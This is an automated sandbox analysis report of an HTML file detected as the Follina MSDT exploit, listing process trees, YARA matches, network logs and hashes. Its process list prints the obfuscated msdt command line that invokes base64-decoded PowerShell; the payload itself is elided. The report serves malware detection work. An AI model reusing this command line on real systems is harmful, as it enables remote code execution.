Windows Analysis Report: fbGUvJ4AdV.html
Overview
General Information
Detection
Score: | 48 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
- System is w10x64
- chrome.exe (PID: 4756 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 0FEC2748F363150DC54C1CAFFB1A9408)
  - chrome.exe (PID: 6264 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1964 --field-trial-handle=1828,i,12602353745346656133,16460015602543345588,131072 /prefetch:8 MD5: 0FEC2748F363150DC54C1CAFFB1A9408)
  - msdt.exe (PID: 1932 cmdline: "C:\Windows\system32\msdt.exe" ms-msdt:/Id%20PcwDiagnOstic%20-skIP%20FORCE%20-paraM%20%22It_ReBrOwsefoRfILE=#fbK%20IT_LaunchMethod=ContextMenu%20IT_BrowseForFile=I$(Iex($(Iex('[SYStem.teXT.eNCoDiNG]'+[ChaR]0x3A+[cHaR]58+'UTF8.gEtSTRInG([SYStEm.conVeRT]'+[CHAR]58+[ChAR]58+'fROmbasE64strInG('+[ChaR]0X22+'[base64 payload elided]'+[Char]34+'))'))))Ti/../../../../../../../../../../.mSi%20%22 MD5: 8BE43BAF1F37DA5AB31A53CA1C07EE0C)
- chrome.exe (PID: 6468 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "C:\Users\user\Desktop\fbGUvJ4AdV.html" MD5: 0FEC2748F363150DC54C1CAFFB1A9408)
- cleanup
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
 | JoeSecurity_Follina | Yara detected Microsoft Office Exploit Follina / CVE-2022-30190 | Joe Security | |
 | JoeSecurity_Follina | Yara detected Microsoft Office Exploit Follina / CVE-2022-30190 | Joe Security | |
 | JoeSecurity_Follina | Yara detected Microsoft Office Exploit Follina / CVE-2022-30190 | Joe Security | |
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | 1 Command and Scripting Interpreter | Path Interception | 1 Process Injection | 2 Masquerading | OS Credential Dumping | 1 Application Window Discovery | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | 1 Encrypted Channel | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | 1 Process Injection | LSASS Memory | 1 System Information Discovery | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | 3 Non-Application Layer Protocol | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Obfuscated Files or Information | Security Account Manager | Query Registry | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | 4 Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Binary Padding | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | 1 Ingress Tool Transfer | SIM Card Swap | Carrier Billing Fraud | |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
 | 12% | ReversingLabs | Script.Exploit.Heuristic | |
 | 0% | Metadefender | | Browse |
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
accounts.google.com | 216.58.215.237 | true | false | | high |
www.google.com | 172.217.168.36 | true | false | | high |
clients.l.google.com | 172.217.168.78 | true | false | | high |
clients2.google.com | unknown | unknown | false | | high |
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
 | false | | high |
 | false | | high |
IP | Domain | Country | ASN | ASN Name | Malicious |
---|---|---|---|---|---|
216.58.215.237 | accounts.google.com | United States | 15169 | GOOGLEUS | false |
172.217.168.78 | clients.l.google.com | United States | 15169 | GOOGLEUS | false |
172.217.168.36 | www.google.com | United States | 15169 | GOOGLEUS | false |
239.255.255.250 | unknown | Reserved | unknown | unknown | false |
IP |
---|
192.168.2.1 |
192.168.2.23 |
127.0.0.1 |
Joe Sandbox Version: | 35.0.0 Citrine |
Analysis ID: | 696621 |
Start date and time: | 2022-09-02 15:36:44 +02:00 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 6m 59s |
Hypervisor based Inspection enabled: | false |
Report type: | light |
Sample file name: | fbGUvJ4AdV.html |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211 |
Run name: | Without Instrumentation |
Number of analysed new started processes analysed: | 28 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: | |
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal48.expl.winHTML@41/0@4/7 |
EGA Information: | Failed |
HDC Information: | Failed |
HCA Information: | |
Cookbook Comments: |
- Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WMIADAP.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
- TCP Packets have been reduced to 100
- Excluded IPs from analysis (whitelisted): 172.217.168.35, 142.250.203.110, 74.125.160.202, 216.58.215.234, 172.217.168.67
- Excluded domains from analysis (whitelisted): r5---sn-4g5e6nzs.gvt1.com, client.wns.windows.com, fs.microsoft.com, r2---sn-4g5e6nzz.gvt1.com, r1---sn-4g5e6nz7.gvt1.com, ctldl.windowsupdate.com, clientservices.googleapis.com, r5.sn-4g5lznez.gvt1.com, ris.api.iris.microsoft.com, r4---sn-4g5e6nsk.gvt1.com, redirector.gvt1.com, update.googleapis.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, r5---sn-4g5lznez.gvt1.com, optimizationguide-pa.googleapis.com
- Not all processes were analyzed, report is missing behavior information
- Report size getting too big, too many NtProtectVirtualMemory calls found.
- Report size getting too big, too many NtWriteVirtualMemory calls found.
- VT rate limit hit for: fbGUvJ4AdV.html
File type: | |
Entropy (8bit): | 6.049533660136345 |
TrID: | |
File name: | fbGUvJ4AdV.html |
File size: | 19189 |
MD5: | da3469806af3aacbbbd22a763343fff2 |
SHA1: | 6d9fd23a4d32a5963c24d39b5402eeaf2a54f093 |
SHA256: | c3afbf5a136b204e16eb6e1cf00cbb03ee36eff42f519f26f1d1d1e58f0b87e1 |
SHA512: | 7e0cbfb15bf2bc8bbbb1727ba9bcfc472bad56b6887457be564ab84b1d69c6ad81dc827e1d04cc57f3f3e4255494484073dee58a79a390e08fe3888939730a2d |
SSDEEP: | 384:9W4t9eJgaU7XWH7/hjoNso7qSVUajB+IOFFUD6kNTPhFEsAll:neJgaUShENTHVFVwHM1phFEse |
TLSH: | A082C0A9D03658346DD45C134A753D96BD20FA75C4BC9B282E4CF72D532D4E1ED8283A |
File Content Preview: | <!DOctYpE hTmL>....<HtML>....<bodY>....<ScRiPT laNGUAGe="jscripT">....//Nn2wp6S4Yl6LHD8RlkuH2nRrwM4IwiGC2LqC6DJpN8XYHUc8JE1CS322bpIjLLlSzFr2pDpqdRNlULZdgV0m7sAoiC4lFm8MHONeXSmmMbu8RCnbuU8BXfdqJNfW9P9Ywgg9nOxJaWPpgS3g05gaFqEmQGOCbebhz32j6P95K6A0kX8Y1Cv7mnh |
Icon Hash: | 78d0a8cccc88c460 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Sep 2, 2022 15:37:55.181704998 CEST | 60326 | 53 | 192.168.2.7 | 8.8.8.8 |
Sep 2, 2022 15:37:55.201868057 CEST | 53 | 60326 | 8.8.8.8 | 192.168.2.7 |
Sep 2, 2022 15:37:55.369452000 CEST | 50505 | 53 | 192.168.2.7 | 8.8.8.8 |
Sep 2, 2022 15:37:55.387327909 CEST | 53 | 50505 | 8.8.8.8 | 192.168.2.7 |
Sep 2, 2022 15:37:55.436525106 CEST | 61178 | 53 | 192.168.2.7 | 8.8.8.8 |
Sep 2, 2022 15:37:55.463624001 CEST | 53 | 61178 | 8.8.8.8 | 192.168.2.7 |
Sep 2, 2022 15:39:55.318778038 CEST | 59546 | 53 | 192.168.2.7 | 8.8.8.8 |
Sep 2, 2022 15:39:55.336882114 CEST | 53 | 59546 | 8.8.8.8 | 192.168.2.7 |
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class |
---|---|---|---|---|---|---|---|
Sep 2, 2022 15:37:55.181704998 CEST | 192.168.2.7 | 8.8.8.8 | 0x3245 | Standard query (0) | | A (IP address) | IN (0x0001) |
Sep 2, 2022 15:37:55.369452000 CEST | 192.168.2.7 | 8.8.8.8 | 0xc5c5 | Standard query (0) | | A (IP address) | IN (0x0001) |
Sep 2, 2022 15:37:55.436525106 CEST | 192.168.2.7 | 8.8.8.8 | 0x7a44 | Standard query (0) | | A (IP address) | IN (0x0001) |
Sep 2, 2022 15:39:55.318778038 CEST | 192.168.2.7 | 8.8.8.8 | 0x96a | Standard query (0) | | A (IP address) | IN (0x0001) |
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class |
---|---|---|---|---|---|---|---|---|---|
Sep 2, 2022 15:37:55.201868057 CEST | 8.8.8.8 | 192.168.2.7 | 0x3245 | No error (0) | | | 216.58.215.237 | A (IP address) | IN (0x0001) |
Sep 2, 2022 15:37:55.387327909 CEST | 8.8.8.8 | 192.168.2.7 | 0xc5c5 | No error (0) | | | 172.217.168.36 | A (IP address) | IN (0x0001) |
Sep 2, 2022 15:37:55.463624001 CEST | 8.8.8.8 | 192.168.2.7 | 0x7a44 | No error (0) | | clients.l.google.com | | CNAME (Canonical name) | IN (0x0001) |
Sep 2, 2022 15:37:55.463624001 CEST | 8.8.8.8 | 192.168.2.7 | 0x7a44 | No error (0) | | | 172.217.168.78 | A (IP address) | IN (0x0001) |
Sep 2, 2022 15:39:55.336882114 CEST | 8.8.8.8 | 192.168.2.7 | 0x96a | No error (0) | | | 172.217.168.36 | A (IP address) | IN (0x0001) |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
0 | 192.168.2.7 | 49740 | 216.58.215.237 | 443 | C:\Program Files\Google\Chrome\Application\chrome.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
2022-09-02 13:37:56 UTC | 0 | OUT | |
2022-09-02 13:37:56 UTC | 0 | OUT | |
2022-09-02 13:37:56 UTC | 0 | IN | |
2022-09-02 13:37:56 UTC | 2 | IN | |
2022-09-02 13:37:56 UTC | 2 | IN | |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
1 | 192.168.2.7 | 49743 | 172.217.168.78 | 443 | C:\Program Files\Google\Chrome\Application\chrome.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
2022-09-02 13:37:56 UTC | 2 | OUT | |
2022-09-02 13:37:56 UTC | 2 | IN | |
2022-09-02 13:37:56 UTC | 3 | IN | |
2022-09-02 13:37:56 UTC | 4 | IN | |
2022-09-02 13:37:56 UTC | 4 | IN | |
Target ID: | 0 |
Start time: | 15:37:44 |
Start date: | 02/09/2022 |
Path: | C:\Program Files\Google\Chrome\Application\chrome.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7c2920000 |
File size: | 2851656 bytes |
MD5 hash: | 0FEC2748F363150DC54C1CAFFB1A9408 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | moderate |
Target ID: | 3 |
Start time: | 15:37:48 |
Start date: | 02/09/2022 |
Path: | C:\Program Files\Google\Chrome\Application\chrome.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7c2920000 |
File size: | 2851656 bytes |
MD5 hash: | 0FEC2748F363150DC54C1CAFFB1A9408 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | moderate |
Target ID: | 4 |
Start time: | 15:37:51 |
Start date: | 02/09/2022 |
Path: | C:\Program Files\Google\Chrome\Application\chrome.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7c2920000 |
File size: | 2851656 bytes |
MD5 hash: | 0FEC2748F363150DC54C1CAFFB1A9408 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | moderate |
Target ID: | 21 |
Start time: | 15:39:23 |
Start date: | 02/09/2022 |
Path: | C:\Windows\System32\msdt.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7ed150000 |
File size: | 1560576 bytes |
MD5 hash: | 8BE43BAF1F37DA5AB31A53CA1C07EE0C |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Yara matches: | |
Reputation: | moderate |